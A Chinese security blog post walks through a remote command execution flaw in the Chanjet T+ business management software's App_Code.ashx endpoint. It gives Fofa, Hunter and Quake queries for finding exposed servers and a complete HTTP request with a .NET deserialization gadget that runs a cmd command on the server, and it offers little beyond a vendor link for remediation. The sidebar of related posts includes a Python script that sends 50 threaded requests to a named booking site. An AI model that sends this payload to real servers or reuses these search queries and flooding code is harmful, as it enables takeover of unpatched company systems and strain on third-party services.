【漏洞复现】畅捷通T+ App_Code.ashx 远程命令执行漏洞

于 2024-06-17 09:00:00 发布
阅读量582 收藏 5
点赞数 9
分类专栏: 漏洞复现 文章标签: web 网络安全 渗透测试 漏洞 漏洞复现 远程命令执行 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/139729080
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。

漏洞描述

畅捷通T+ Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore 接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。

网络空间会测

Fofa

app="畅捷通-TPlus"

Hunter

app.name=="畅捷通 T+"

Quake

app:"畅捷通-TPlus"

image.png

漏洞复现

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 592
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
X-Ajaxpro-Method: GetStoreWarehouseByStore
Accept-Encoding: gzip, deflate, br

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c echo test > test.txt"
        }
    }
  }
}

image.png

http://127.0.0.1/tplus/test.txt
image.png

修复建议

请关注厂商获取安全补丁:https://www.chanjet.com

关注公众号,获取更多安全资讯:
在这里插入图片描述

凝聚力安全团队
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现】用友-捷通T+-App_Code-远程命令执行
知黑而守白
01-22 202
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在远程命令执行漏洞。攻击者可以通过构造恶意的数据包,成功注入并执行恶意命令,可能导致系统敏感信息泄露、篡改、服务器接管或其他严重后果。
捷通T+ 反序列化漏洞复现(QVD-2023-13615)
0xSec
06-23 4366
捷通 T+ 存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令
用友捷通T+-某接口存在远程命令执行漏洞-未公开1day漏洞复现
weixin_43167326的博客
01-29 625
用友捷通T+软件存在远程命令执行漏洞,攻击者可以利用该漏洞绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前该漏洞已被攻击者利用来进行勒索病毒攻击,建议客户尽快做好自查及防护。
捷通T+SQL注入漏洞
holyxp的博客
07-27 846
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行
捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
Ryan的博客
10-13 4643
2022年8月29日和8月30日,捷通公司紧急发布安全补丁修复了捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞,通过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。
捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0xSec
06-14 3703
捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行
用友捷通CRM存在默认空口令漏洞
nnn2188185的博客
04-23 453
用友捷通CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
upload_ajax.ashx
11-03
upload_ajax.ashx用于图片上传初始化,webuploader,kindeditor等
声乐教学中的_OH卡牌_探索.ashx
09-21
声乐教学中的_OH卡牌_探索.ashx
ajax+json+ashx实现注册.rar
03-13
vs2019开发请使用vs2019或以上版本打开,介绍了前后台通讯和使用StreamReader,context.Request.InputStream,JavaScriptSerializer接收数据进行处理
Asp.net+jquery+.ashx文件实现分页思路
10-27
分页思路: .ashx程序中,编写好取得不同页码的程序。在页面布局好的前提下,留下数据区域 div。然后在页面请求 .ashx程序生成下一页的html代码。覆盖div.innerHTMl
1686581417596849_linker_allfile.ashx
06-12
1686581417596849_linker_allfile.ashx
0day漏洞-捷通TPlus Ufida.T.DI.UIP.ashx存在远程命令执行漏洞 附POC软件
weixin_43167326的博客
03-18 795
捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。捷通TPlus存在远程命令执行漏洞
漏洞复现】用友捷通T+ SQL注入漏洞
2301_79099363的博客
07-13 1408
漏洞复现】用友捷通T+ SQL注入漏洞
捷通T+ v17任意文件上传漏洞复现
fly夏天的博客
09-01 4214
捷通T+ v17任意上传漏洞复现
捷通T+勒索病毒事件看文件上传漏洞的攻防之道
dzqxwzoe的博客
08-02 772
此次的勒索病毒事件与捷通T+软件供应链攻击直接相关。在遭遇勒索病毒攻击后,不光涉及到企业IT网络,工业网互联网络同样面临着病毒的威胁。因此,对于工业互联网的相关用户也应该予以重视。六方云一直致力于保护工业互联网安全,在工业安全领域拥有多项核心技术。其神探系列产品部署于工业互联网边界,及时精确发现、阻断已知和未知威胁,包括此次类似捷通T+的常规文件上传漏洞攻击。工业卫士则用于部署于核心服务器终端,及时扫描和查杀病毒。六方云团队将持续提供专业的产品及服务,切实帮助用户抵御工业互联网安全攻击。
用友捷通RRATableController存在反序列化漏洞
最新发布
qq_36334672的博客
04-01 279
用友捷通 T+ /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令
漏洞复现1day】捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
qq_34780861的博客
03-21 705
捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
用python写一个post请求 url是:http://ziran.weiyee.com/ziran_wei_html/ashx/yuyue_ju.ashx请求的参数是:userId=1369788&md5=f99e4&validCode=123&scheduleId=44245&type=0&num=1要求50个线程请求
06-12
以下是使用Python中的requests和threading库实现50个线程请求的示例代码: ```python import requests import threading # 请求参数 params = { 'userId': '1369788', 'md5': 'f99e4', 'validCode': '123', 'scheduleId': '44245', 'type': '0', 'num': '1' } # 请求的url url = 'http://ziran.weiyee.com/ziran_wei_html/ashx/yuyue_ju.ashx' # 定义请求函数 def request(): # 发送POST请求 response = requests.post(url, data=params) # 打印响应结果 print(response.text) # 创建50个线程 threads = [] for i in range(50): t = threading.Thread(target=request) threads.append(t) # 启动所有线程 for t in threads: t.start() # 等待所有线程执行完毕 for t in threads: t.join() ``` 注意:该代码只是一个示例,实际使用时应该根据实际情况调整请求参数和线程数。同时,发送大量请求可能会对服务器造成负担,应该谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值